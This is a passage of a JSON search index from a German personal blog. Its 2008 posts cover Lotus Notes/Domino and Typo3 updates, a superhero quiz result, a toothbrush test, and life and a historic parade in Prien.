style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=45\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 45%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Wonder Woman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=35\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 35%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Catwoman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=25\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 25%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/table\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e You are intelligent, witty, \u0026lt;br /\u0026gt;a bit geeky and have great\u0026lt;br /\u0026gt; power and responsibility.\u0026lt;br /\u0026gt; \u0026lt;img \u003cspan style=\"color:#268bd2\"\u003eSRC\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.thesuperheroquiz.com/pics/spidy.gif\u0026#34;\u003c/span\u003e /\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eClick here to take the “Which Superhero am I?” quiz…\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eVia \u003ca href=\"http://www.eknori.de\" target=\"_blank\"\u003eEknori \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-09-24-nearly-spiderman/","title":"Nearly Spiderman"},{"body":"Ein neuer Notes.ini Eintrag ist in 8.0.2 hinzugekommen, der steuern soll, welche Clientversion geöffnet wird. Also Notes 8 oder Notes 8 Basic. Vorteil ist, daß dann auch die richtige Clientart geöffnet wird, wenn man auf einen Mailto-Link klickt, oder ähnliches.\n[…]launch the Basic client based on a Notes.ini parameter UseBasicNotes=1. This notes.ini parameter will allow external programs that launch notes, such as a MailTo: URL, or launching an NSF file directly,[…]\nvia: vowe \u0026amp; Ed Brill ","excerpt":"\u003cp\u003eEin neuer Notes.ini Eintrag ist in 8.0.2 hinzugekommen, der steuern\nsoll, welche Clientversion geöffnet wird. Also Notes 8 oder Notes 8\nBasic. Vorteil ist, daß dann auch die richtige Clientart geöffnet wird,\nwenn man auf einen Mailto-Link klickt, oder ähnliches.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…]launch the Basic client based on a Notes.ini parameter\nUseBasicNotes=1. This notes.ini parameter will allow external programs\nthat launch notes, such as a MailTo: URL, or launching an NSF file\ndirectly,[…]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003evia: \u003ca href=\"http://vowe.net/archives/009861.html\" target=\"_blank\"\u003evowe \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u0026amp;\n\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/usebasicnotes1\" target=\"_blank\"\u003eEd Brill \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-09-02-usebasicnotes/","title":"UseBasicNotes"},{"body":"Im Moment komme ich fast nicht dazu im Web zu surfen, geschweige denn einen Blogeintrag zu schreiben. Mir gehen aber doch mehrere coole und interessante Dinge durch den Kopf, die in näherer Zukunft hier im Blog beschrieben werden.\nWas gab es Neues diese Woche? Vmware Update Vmware Workstation 6 wurde aktualisiert. Die aktuelle Version ist auf der Webseite von Vmware seit 28.08.2008 verfügbar. Vmware Workstation ist im Moment die von mir am Meisten eingesetzte Software, da hier Testumgebungen schnell eingerichtet werden können. Der Snapshot-Mechanismus der Workstationversion ist absolut genial und über die Clonefunktion lassen sich schnell zusätzliche virtuelle Server erstellen.\nDomino 8.0.2 Lotus Domino 8.0.2 englisch verfügbar und laut Blogosphäre mit ziemlichen Performance-Gewinnen. Ich habe bisher nur einen Mailserver aktualisiert und einen Client getestet.\nAufgefallen ist mir, daß die neue Ultralite Ansicht des Webaccess nirgends genauer beschrieben wird. Wie wird sie aufgerufen, oder muß ausser einem Schablonenupdate etwas durchgeführt werden?\nDie Schablone des Webmail Redirect wurde aktualisiert und unter den Setup-Einstellungen gibt es jetzt einen Punkt “iphone, ipod”. Danach sollte die Ultraliteview funktionieren, eventuell muß der Safari Browsercache geleert werden.\nhttp://www-01.ibm.com/software/lotus/products/domino-web-access/ultralite/ http://www.heise.de/newsticker/Lotus-Notes-und-Domino-8-0-2-schneller-und-mit-iPhone-Unterstuetzung–/meldung/114888 Domino 8.5 Beta 2 Domino 8.5 Beta 2 ist ebenfalls erschienen und kann heruntergeladen werden. Die neuen Funktionen hören sich interessant an und ich hoffe ich komme im Lauf der Woche dazu sie zu testen, dann mehr dazu.\nhttp://www.pmooney.net/pmooney/pmooneynet.nsf/d6plinks/PMOY-7HUEHA [http://www.eknori.de/2008-08-30/notes-85-new-install-options/ ]3 ","excerpt":"\u003cp\u003eIm Moment komme ich fast nicht dazu im Web zu surfen, geschweige denn\neinen Blogeintrag zu schreiben. Mir gehen aber doch mehrere coole und\ninteressante Dinge durch den Kopf, die in näherer Zukunft hier im Blog\nbeschrieben werden.\u003c/p\u003e\n\u003ch1 id=\"was-gab-es-neues-diese-woche\"\u003eWas gab es Neues diese Woche? \u003ca href=\"#was-gab-es-neues-diese-woche\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003ch2 id=\"vmware-update\"\u003eVmware Update \u003ca href=\"#vmware-update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eVmware Workstation 6 wurde aktualisiert. Die aktuelle Version ist auf\nder Webseite von \u003ca href=\"http://www.vmware.com\" target=\"_blank\"\u003eVmware \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n seit 28.08.2008\nverfügbar. Vmware Workstation ist im Moment die von mir am Meisten\neingesetzte Software, da hier Testumgebungen schnell eingerichtet werden\nkönnen. Der Snapshot-Mechanismus der Workstationversion ist absolut\ngenial und über die Clonefunktion lassen sich schnell zusätzliche\nvirtuelle Server erstellen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-08-31-viel-zu-tun/","title":"Viel zu tun"},{"body":"Durch Paula bin ich jetzt oft zu Fuß mit dem Kinderwagen unterwegs und mit dabei ist entweder die Handy Kamera, oder die Digi-Cam.\nDer Holunder wird inzwischen reif und die Wärme am Sonntag war sehr entspannend.\nhttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817holler.jpg Eine der nervigsten Dinge in Prien, ist zumindest während der Sommersaison, die historische Chiemsee-Bahn. Diese Dampflok pfeift unentwegt und verdammt laut.\nNaja, aber sie gehört halt dazu und daher hier noch ein Bild:\nhttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817chiemseebahn.jpg ","excerpt":"\u003cp\u003eDurch Paula bin ich jetzt oft zu Fuß mit dem Kinderwagen unterwegs und\nmit dabei ist entweder die Handy Kamera, oder die Digi-Cam.\u003c/p\u003e\n\u003cp\u003eDer Holunder wird inzwischen reif und die Wärme am Sonntag war sehr\nentspannend.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2008/08/20080817holler.jpg\" target=\"_blank\"\u003ehttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817holler.jpg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eEine der nervigsten Dinge in Prien, ist zumindest während der\nSommersaison, die historische Chiemsee-Bahn. Diese Dampflok pfeift\nunentwegt und verdammt laut.\u003c/p\u003e\n\u003cp\u003eNaja, aber sie gehört halt dazu und daher hier noch ein Bild:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2008/08/20080817chiemseebahn.jpg\" target=\"_blank\"\u003ehttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817chiemseebahn.jpg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-08-19-spaziergang/","title":"Spaziergang"},{"body":"In letzter Zeit war ich ja wieder etwas schreibfaul, aber das liegt daran, daß ich mich gerade aus meinem alten Job bei den Stadtwerken Rosenheim verabschiede und noch die eine oder andere Dokumentation zu meinen Servern und Skripten erstelle. Da habe ich abends meist keine Lust mehr noch zu schreiben.\nAb 1. August fange ich dann meine neue Arbeit bei Edcom an. Auf diese Tätigkeit freue ich mich ehrlich gesagt wahnsinnig! Nachdem meine dortige Arbeit wieder den Schwerpunkt Lotus Notes / Domino haben wird, werde ich mir den Typo3 -Relaunch des Blogs nochmal überlegen. In nächster Zeit bleibt hier erstmal alles beim Alten, nur am Design werd ich einige Anpassungen durchführen.\n","excerpt":"\u003cp\u003eIn letzter Zeit war ich ja wieder etwas schreibfaul, aber das liegt\ndaran, daß ich mich gerade aus meinem alten Job bei den\n\u003ca href=\"http://www.swro.de\" target=\"_blank\"\u003eStadtwerken Rosenheim \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n verabschiede und noch die eine\noder andere Dokumentation zu meinen Servern und Skripten erstelle. Da\nhabe ich abends meist keine Lust mehr noch zu schreiben.\u003c/p\u003e\n\u003cp\u003eAb 1. August fange ich dann meine neue Arbeit bei\n\u003ca href=\"http://www.edcom.de\" target=\"_blank\"\u003eEdcom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n an. Auf diese Tätigkeit freue ich mich\nehrlich gesagt wahnsinnig! Nachdem meine dortige Arbeit wieder den\nSchwerpunkt \u003ca href=\"http://www.ibm.com/lotus\" target=\"_blank\"\u003eLotus Notes / Domino \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n haben wird,\nwerde ich mir den \u003ca href=\"http://typo3.org\" target=\"_blank\"\u003eTypo3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Relaunch des Blogs nochmal\nüberlegen. In nächster Zeit bleibt hier erstmal alles beim Alten, nur am\nDesign werd ich einige Anpassungen durchführen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-07-13-neuer-job/","title":"Neuer Job"},{"body":"Das ist doch wieder der Oberschwachsinn. Immer mehr Kontrollen, immer mehr Datenbanken und Verküpfungsmöglichkeiten.\nSo kommt auf fast jedes Unternehmen eine Unmenge Personalaufwand und Zusatzkosten und auf die zahlreichen Versicherungen ein riesiger Datenwust zu. Für die allermeisten Berufsgenossenschaften war eine individuelle Zeiterfassung bislang schlichtweg nicht notwendig. Es bleibt unklar, warum der Gesetzgeber diese einführen will.\n— gulli: Stechuhr und Bürokratie: Bundestag will Arbeitszeiterfassung für jeden Betrieb http://www.gulli.com/news/stechuhr-und-b-rokratie-2008-06-26/ ","excerpt":"\u003cp\u003eDas ist doch wieder der Oberschwachsinn. Immer mehr Kontrollen, immer\nmehr Datenbanken und Verküpfungsmöglichkeiten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eSo kommt auf fast jedes Unternehmen eine Unmenge Personalaufwand und Zusatzkosten und auf die zahlreichen Versicherungen ein riesiger Datenwust zu. Für die allermeisten Berufsgenossenschaften war eine individuelle Zeiterfassung bislang schlichtweg nicht notwendig. Es bleibt unklar, warum der Gesetzgeber diese einführen will.\u003c/p\u003e\n\u003cp\u003e—\ngulli: Stechuhr und Bürokratie: Bundestag will Arbeitszeiterfassung für jeden Betrieb\n\u003ca href=\"http://www.gulli.com/news/stechuhr-und-b-rokratie-2008-06-26/\" target=\"_blank\"\u003ehttp://www.gulli.com/news/stechuhr-und-b-rokratie-2008-06-26/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2008/2008-06-27-gulli-stechuhr-und-burokratie-bundestag-will-arbeitszeiterfassung-fur-jeden-betrieb/","title":"gulli: Stechuhr und Bürokratie: Bundestag will Arbeitszeiterfassung für jeden Betrieb"},{"body":"Heute war der historische Umzug zur Feier des 850-jährigen Jubiläums von Prien. Es war ein wirklich schönes Ereignis, das mir als Teilnehmer sehr viel Spaß gemacht hat.\nDie Wagen und Kostüme waren mit viel Liebe zum Detail geschmückt und trotz der Hitze und strahlendem Sonnenschein wurde auch auf Pelze (Ritter auf English Horse) nicht verzichtet. Die Ludwig-Thoma-Schützen zeigten die Markterhebung 1897. Auf dem Wagen befanden sich der Bürgermeister, mit Gemeinderat und der Ernennungsurkunde. Den Wagen begleiteten als Bürger kostümierte Vereinsmitglieder, die z.T. an \u0026ldquo;Unsere kleine Farm\u0026rdquo; erinnerten.\nhttp://wp.stoeps.de/wp-content/uploads/2008/06/prien850_lts.jpg Weitere Fotos und mehr Details zum Wagen der Ludwig-Thoma-Schützen werde ich die nächsten Tage unter http://lts.prien.de unter Chronik einstellen.\n","excerpt":"\u003cp\u003eHeute war der historische Umzug zur Feier des 850-jährigen Jubiläums von\nPrien. Es war ein wirklich schönes Ereignis, das mir als Teilnehmer sehr\nviel Spaß gemacht hat.\u003c/p\u003e\n\u003cp\u003eDie Wagen und Kostüme waren mit viel Liebe zum Detail geschmückt und\ntrotz der Hitze und strahlendem Sonnenschein wurde auch auf Pelze\n(Ritter auf English Horse) nicht verzichtet. Die Ludwig-Thoma-Schützen\nzeigten die Markterhebung 1897. Auf dem Wagen befanden sich der\nBürgermeister, mit Gemeinderat und der Ernennungsurkunde. Den Wagen\nbegleiteten als Bürger kostümierte Vereinsmitglieder, die z.T. an\n\u0026ldquo;Unsere kleine Farm\u0026rdquo; erinnerten.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2008/06/prien850_lts.jpg\" target=\"_blank\"\u003ehttp://wp.stoeps.de/wp-content/uploads/2008/06/prien850_lts.jpg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eWeitere Fotos und mehr Details zum Wagen der Ludwig-Thoma-Schützen werde\nich die nächsten Tage unter \u003ca href=\"http://lts.prien.de\" target=\"_blank\"\u003ehttp://lts.prien.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n unter Chronik\neinstellen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-22-historischer-umzug-in-prien/","title":"Historischer Umzug in Prien"},{"body":"Morgen ist, zur 850-Jahrfeier , ein historischer Umzug in Prien.\nAufstellung ist zwischen 11 und 12 Uhr. Start des Zuges, der ca. 60 Pferdefuhrwerke mit historischen Ereignissen zeigt, ist dann um 13 Uhr.\nDie Ludwig-Thoma-Schützen zeigen die Markterhebung 1896 auf dem Wagen 20.\n","excerpt":"\u003cp\u003eMorgen ist, zur\n\u003ca href=\"http://tourismus.prien.de/de/main/850_jahre_prien_am_chiemsee.htm\" target=\"_blank\"\u003e850-Jahrfeier \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nein historischer Umzug in Prien.\u003c/p\u003e\n\u003cp\u003eAufstellung ist zwischen 11 und 12 Uhr. Start des Zuges, der ca. 60\nPferdefuhrwerke mit historischen Ereignissen zeigt, ist dann um 13 Uhr.\u003c/p\u003e\n\u003cp\u003eDie \u003ca href=\"http://lts.stoeps.de\" target=\"_blank\"\u003eLudwig-Thoma-Schützen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zeigen die Markterhebung\n1896 auf dem Wagen 20.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-21-prien-wird-850-jahre/","title":"Prien wird 850 Jahre"},{"body":"Ich habe mich vor ein paar Wochen bei trnd angemeldet und mich dort für den Test der Zahnbürste Philips Sonicare beworben.\nBisher hat mich immer der Preis (um die 100€) vom Erwerb einer elektrischen Zahnbürste abgehalten. Bei trnd wurde ich für den Test ausgewählt und jetzt kann ich die Zahnbürste problemlos testen und wenn mich das Produkt überzeugt auch Werbung dafür machen.\nDie ersten Male Zähneputzen habe ich jetzt mit der Sonicare hinter mir und ich muss sagen, dass mir das Putzen damit immer besser gefällt. Am Anfang war die Vibration im Mund und das Geräusch doch sehr ungewohnt, ja z.T. sogar unangenehm. Nach der kurzen Eingewöhnungsphase macht mir das allerdings nichts mehr aus.\nDie Putzleistung hat mich dagegen von Anfang an überzeugt und bei der Benutzung von zusätzlicher Zahnseide oder Interdentalbürstchen ist praktisch kein Restbelag, auch zwischen den Zähnen, mehr vorhanden.\nAllerdings bin ich mir nicht sicher, ob ich die Sonicare auch zum normalen Ladenpreis kaufen würde, da der Preis in Relation zu einer Handzahnbürste doch etwas höher ist.\n","excerpt":"\u003cp\u003eIch habe mich vor ein paar Wochen bei \u003ca href=\"http://www.trnd.com\" target=\"_blank\"\u003etrnd \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nangemeldet und mich dort für den Test der Zahnbürste\n\u003ca href=\"http://www.homeandbody.philips.com/sonicare/de_de/\" target=\"_blank\"\u003ePhilips Sonicare \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nbeworben.\u003c/p\u003e\n\u003cp\u003eBisher hat mich immer der Preis (um die 100€) vom Erwerb einer\nelektrischen Zahnbürste abgehalten. Bei trnd wurde ich für den Test\nausgewählt und jetzt kann ich die Zahnbürste problemlos testen und wenn\nmich das Produkt überzeugt auch Werbung dafür machen.\u003c/p\u003e\n\u003cp\u003eDie ersten Male Zähneputzen habe ich jetzt mit der Sonicare hinter mir\nund ich muss sagen, dass mir das Putzen damit immer besser gefällt. Am\nAnfang war die Vibration im Mund und das Geräusch doch sehr ungewohnt,\nja z.T. sogar unangenehm. Nach der kurzen Eingewöhnungsphase macht mir\ndas allerdings nichts mehr aus.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-21-zahnburstentest/","title":"Zahnbürstentest"},{"body":"Ich dachte eigentlich, daß der Relaunch mit Typo3 schneller über die Bühne geht, aber leider bin ich noch in der Testphase.\nDaher habe ich heute Nacht die Blogsoftware auf Version 2.5.1 aktualisiert. An sich ging es diesmal problemlos, nur bei ftp-Upload hat Cyberduck ein paar Dateien nicht geändert und es kam zu Fehlermeldungen, die aber schnell behoben waren.\nTheme bleibt vorerst gleich, ich hoffe immer noch auf einen schnellen Wechsel zu Typo3.\n","excerpt":"\u003cp\u003eIch dachte eigentlich, daß der Relaunch mit \u003ca href=\"http://www.typo3.org\" target=\"_blank\"\u003eTypo3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nschneller über die Bühne geht, aber leider bin ich noch in der\nTestphase.\u003c/p\u003e\n\u003cp\u003eDaher habe ich heute Nacht die Blogsoftware auf Version 2.5.1\naktualisiert. An sich ging es diesmal problemlos, nur bei ftp-Upload hat\n\u003ca href=\"http://www.cyberduck.ch\" target=\"_blank\"\u003eCyberduck \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ein paar Dateien nicht geändert und\nes kam zu Fehlermeldungen, die aber schnell behoben waren.\u003c/p\u003e\n\u003cp\u003eTheme bleibt vorerst gleich, ich hoffe immer noch auf einen schnellen\nWechsel zu Typo3.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-21-wordpress-update-auf-251-erfolgreich/","title":"WordPress Update auf 2.5.1 erfolgreich"},{"body":"Ich habe gerade meine Seiten http://lts.stoeps.de von Typo3 4.0.4 auf 4.2.1 aktualisiert und war überrascht, dass dies so einfach möglich war. Nur die neuen Typo3_src-Files per FTP übertragen, den Update Wizard starten und schon paßt es wieder.\n","excerpt":"\u003cp\u003eIch habe gerade meine Seiten \u003ca href=\"http://lts.stoeps.de\" target=\"_blank\"\u003ehttp://lts.stoeps.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n von\n\u003ca href=\"http://www.typo3.org\" target=\"_blank\"\u003eTypo3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 4.0.4 auf 4.2.1 aktualisiert und war\nüberrascht, dass dies so einfach möglich war. Nur die neuen\nTypo3_src-Files per FTP übertragen, den Update Wizard starten und schon\npaßt es wieder.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-20-typo3-update-problemlos/","title":"Typo3 Update problemlos"},{"body":"Eine kurze Anleitung um die Auflösung der Linux Konsole in Grub vorzugeben:\nEchoes: How-To: Change Console Resolution\n","excerpt":"\u003cp\u003eEine kurze Anleitung um die Auflösung der Linux Konsole in Grub\nvorzugeben:\u003c/p\u003e\n\u003cp\u003eEchoes: How-To: Change Console Resolution\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-19-echoes-how-to-change-console-resolution/","title":"Echoes: How-To: Change Console Resolution"},{"body":"So, nach langer Zeit mal wieder ein Blogpost.\nIch war die letzten Wochen ziemlich beschäftigt, ich bin seit zwei Wochen Papa und das fordert doch einiges mehr an Zeit, als ich zuerst dachte.\nIn Zukunft werden die Posts aber wieder mehr werden. Ich arbeite gerade an einem Artikel über OpenLDAP und Linux-Authentifizierung, ausserdem plane und arbeite ich an einem kompletten Relaunch meiner Domain mit Typo3. Das Theme ist bereits übernommen und die meisten Anpassungen mit Typoskript und Extensions sind auch schon eingebaut. Momentan fehlt noch ein bisschen Feinschliff von Timtab (Blogextension) und der richtige Provider, ich werde vermutlich die Domains zu einem Typo3-Hoster umziehen, habe mich aber noch nicht entschieden zu welchem. Wenn jemand Tipps hat, dann schreibt doch bitte einen Kommentar oder eine E-Mail.\nEin weiterer Artikel wird Ubuntu 8.04 auf dem Macbook sein, der entsteht aber erst. Im Moment habe ich wieder mal Probleme mit dem WLAN Zugriff auf meinen Airport Express.\nAusserdem habe ich mit Microblogging begonnen. :-) Wer Bock hat, kann ein paar Kurzposts unter http://www.twitter.com/stoeps mitlesen.\nGestern beim Angeln habe ich ca. 300 m vom Ufer entfernt eine Ringelnatter gesehen. Das war sehr schön, siehe folgendes Bild.\nDas Bild der Familie Schwan ist mit dem Handy leider nichts geworden. Ich bin allerdings von der Qualität der Fotos meines neuen Sony-Erikson Handys W580i ziemlich begeistert.\n","excerpt":"\u003cp\u003eSo, nach langer Zeit mal wieder ein Blogpost.\u003c/p\u003e\n\u003cp\u003eIch war die letzten Wochen ziemlich beschäftigt, ich bin seit zwei\nWochen Papa und das fordert doch einiges mehr an Zeit, als ich zuerst\ndachte.\u003c/p\u003e\n\u003cp\u003eIn Zukunft werden die Posts aber wieder mehr werden. Ich arbeite gerade\nan einem Artikel über OpenLDAP und Linux-Authentifizierung, ausserdem\nplane und arbeite ich an einem kompletten Relaunch meiner Domain mit\n\u003ca href=\"http://typo3.org\" target=\"_blank\"\u003eTypo3. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Das Theme ist bereits übernommen und die\nmeisten Anpassungen mit Typoskript und Extensions sind auch schon\neingebaut. Momentan fehlt noch ein bisschen Feinschliff von Timtab\n(Blogextension) und der richtige Provider, ich werde vermutlich 